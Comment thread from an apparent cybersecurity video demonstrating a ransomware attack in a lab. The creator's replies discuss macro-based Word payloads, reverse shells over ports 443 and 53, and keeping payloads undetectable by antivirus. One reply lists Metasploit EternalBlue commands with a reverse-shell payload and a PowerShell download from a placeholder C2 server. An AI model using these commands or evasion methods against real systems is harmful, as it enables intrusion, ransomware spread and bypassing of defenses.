Ransomware Attack Simulation 

Thank you, I will

🤨🤨

Yeeees clients

IKIK

There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

this is interesting technique and similar somehow to a signed malware with a company's private signing key typically to backdoor whitelisted applications. modern cyber sec are getting way more sophisticated than ever.

I Was Also Looking For That Type Of Videos Bro 🥲

Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

@@lockardsecuritywould be interesting to see the document park breakdown!

@@lockardsecurity What about the environment? can we use it please?

I currently do not have them published publicly, however that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

Its in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

I'll be creating an updated video with full end to end which will show the latest and greatest processes and methods.

lol

I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.

@@lockardsecurity guess we will wait

Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!

In this example, there is attack is a Reverse Shell connection. Meaning the victim's system is beaconing on to the Internet (Egress). Not sure if you noticed or not, but the first connection was over TCP port 443 HTTPS. Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 DNS. Another big issue if you try and block DNS on your network. No BIND connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones), will leverage ports that MUST be open, like 53, 80, 443 to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.

Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the users permissions. When this happens, the attack much do a privilege escalation attack to get admin / root access.

Great question, and unfortunately as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few thinks: 1. Scan for malware using trusted antivirus/anti-malware tools. 2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know, that everything uploaded to VirusTotal can be downloaded by anyone that request it. Most folks are security researchers who work for security companies that make Ant-Virus / EDR products and use these uploads to help improve their detection logic. So the take away is, you dont want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they dont submit uploads to 3rd parties like VirusTotal does. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

@@lockardsecurity thank you for taking the time, this was very informative.

Its a broken Macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.

@@lockardsecurity okay thanks lol

@@lockardsecurityI want to learn more about hacking can you make a discord by anychance

Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors doesn't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating move videos on the entire process, start to finish. Along with diving deeper into the code and methods used.

Each ransomware is slightly different, but also slightly similar. Great question and wish I could have responded sooner. I'll create a video on this topic as well. In the mean time for Wannacry, do the following: Tools and Steps for Simulation: 1. Set Up a Controlled Environment: * Use a virtual lab with several Windows machines. * Ensure the environment is completely isolated from any production networks. 2. Simulate Infection Traffic: * Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry. Load Metasploit with the EternalBlue module: bash Copy code msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST exploit * Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files. * Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting). * Generate network traffic to simulate command and control (C2) communication: powershell, Copy code: $WebClient = New-Object System.Net.WebClient $WebClient.DownloadString("your-c2-server.com/command") 3. Monitor and Analyze Traffic: * Use network monitoring tools like Wireshark to capture and analyze the simulated traffic. * Verify the detection of IOCs with your security tools (SIEM, IDS/IPS). 4. Deploy Detection and Prevention Measures: * Implement rules in your security tools to detect the IOCs listed above. * Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

Yes, that is right!

you can't, pay or format your pc

Dang, I'm just now seeing this comment! Hope you were able to do demonstrate this for your class.

broo help me out. im going through the same thingg

Thats right!

Yes

Yes, in this case, the ransomware will act more like a worm, scan the entire network and attempt to spread to all hosts that appear to be up.

Its a broken Macro technique. I recommend taking the OSEP training to learn more about this method.

Is tempmail

in that example it was mailinator

Each AV has its own steps to follow, most are been controlled via Registry or the running process memory space.

@@lockardsecurity Ok. Windows Defender for example, can it be disabled through the malware itself?

same question tried all decryption methods but not work 😢😢

cause u can't only the one who puts it in the system who can which u gonna need to pay for

The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.

​@@BlockImmigrantsso a Firewall rule will block this connection?

​@@TK-od8hdonly if the attacker IP was known beforehand and it was put in the rule

It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise) which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.

generally its hacker

True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

crypter

Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in away that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious,. It requires a lot of testing, trail and error. For example, the methods I used here no longer works, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.

You don't want it :D

To be clear its my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!

That probably all depends on the exploit in the doc

This doc at the time was whats known as a FUD, meaning fully undetectable. However now just about all vendors flag it today. That said, I'll be recreating this video in the near future and will be showing it against all the major AV /' EDR vendors.

Yes, you can reach out to www.lockardsecurity.com Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.